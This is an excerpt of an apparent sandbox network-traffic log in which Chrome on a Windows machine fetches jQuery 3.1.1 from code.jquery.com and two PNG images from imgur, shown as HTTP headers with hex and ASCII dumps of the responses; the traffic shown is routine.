2025-03-24 20:29:39 UTC	539	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:29:39 UTC	562	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Age: 1776463 Date: Mon, 24 Mar 2025 20:29:39 GMT Via: 1.1 varnish X-Served-By: cache-lga21950-LGA X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1742848179.205683,VS0,VE1 Vary: Accept-Encoding
2025-03-24 20:29:39 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2025-03-24 20:29:39 UTC	1378	IN	Data Raw: 3e 3d 30 26 26 63 3c 62 3f 5b 74 68 69 73 5b 63 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 68 2c 73 6f 72 74 3a 63 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 63 2e 73 70 6c 69 63 65 7d 2c 72 2e 65 78 74 65 6e 64 3d 72 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73 Data Ascii: >=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments
2025-03-24 20:29:39 UTC	1378	IN	Data Raw: 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 77 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 61 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 22 22 3a 28 61 2b 22 22 29 2e Data Ascii: n a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").
2025-03-24 20:29:39 UTC	1378	IN	Data Raw: 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 29 7d 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 68 61 28 29 2c 7a 3d 68 61 28 29 2c 41 3d 68 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 6c 3d 21 30 29 2c 30 7d 2c 43 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 44 3d 5b 5d 2c 45 3d 44 2e 70 6f 70 2c 46 3d 44 2e Data Ascii: array"===c\|\|0===b\|\|"number"==typeof b&&b>0&&b-1 in a)}var x=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C={}.hasOwnProperty,D=[],E=D.pop,F=D.
2025-03-24 20:29:39 UTC	1378	IN	Data Raw: 70 28 22 5e 22 2b 4b 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4b 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 57 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 59 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 5a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 24 3d 2f 5b 2b 7e 5d 2f 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61 Data Ascii: p("^"+K+"[>+~]\|:(even\|odd\|eq\|gt\|lt\|nth\|first\|last)(?:\$"+K+"((?:-\\d)?\\d)"+K+"\$\|)(?=[^-]\|$)","i")},W=/^(?:input\|select\|textarea\|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)\|(\w+)\|\.([\w-]+))$/,$=/[+~]/,_=new RegExp("\\\\([\\da
2025-03-24 20:29:39 UTC	1378	IN	Data Raw: 5b 33 5d 29 26 26 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 20 47 2e 61 70 70 6c 79 28 64 2c 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 66 29 29 2c 64 7d 69 66 28 63 2e 71 73 61 26 26 21 41 5b 61 2b 22 20 22 5d 26 26 28 21 71 7c 7c 21 71 2e 74 65 73 74 28 61 29 29 29 7b 69 66 28 31 21 3d 3d 77 29 73 3d 62 2c 72 3d 61 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3a 62 2e 73 65 74 Data Ascii: [3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q\|\|!q.test(a))){if(1!==w)s=b,r=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(ba,ca):b.set
2025-03-24 20:29:39 UTC	1378	IN	Data Raw: 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 61 7c 7c 62 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 61 26 26 65 61 28 62 29 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 22 6c 61 62 65 6c 22 69 6e 20 62 26 26 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65 Data Ascii: e.disabled===a:b.disabled===a:b.isDisabled===a\|\|b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e
2025-03-24 20:29:39 UTC	1378	IN	Data Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 63 26 26 63 2e 76 61 6c 75 65 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 66 29 7b 69 66 28 63 3d 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 2c 63 26 26 63 2e 76 61 6c 75 65 Data Ascii: n function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value
2025-03-24 20:29:39 UTC	1378	IN	Data Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 2f 3e 3c 2f 73 65 6c 65 63 74 3e 22 3b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4b 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 61 2e 71 75 65 72 79 53 Data Ascii: bled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"[^$\|!~]?="),2!==a.queryS
2025-03-24 20:29:39 UTC	1378	IN	Data Raw: 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e Data Ascii: Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e\|\|!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49739	199.232.196.193	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:29:39 UTC	587	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:29:40 UTC	756	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 2551237 Date: Mon, 24 Mar 2025 20:29:39 GMT X-Served-By: cache-iad-kiad7000021-IAD, cache-lga21940-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 11253, 0 X-Timer: S1742848180.957454,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-24 20:29:40 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49738	199.232.196.193	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:29:39 UTC	587	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:29:40 UTC	757	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 2600253 Date: Mon, 24 Mar 2025 20:29:39 GMT X-Served-By: cache-iad-kjyo7100129-IAD, cache-lga21942-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 14884, 0 X-Timer: S1742848180.957978,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 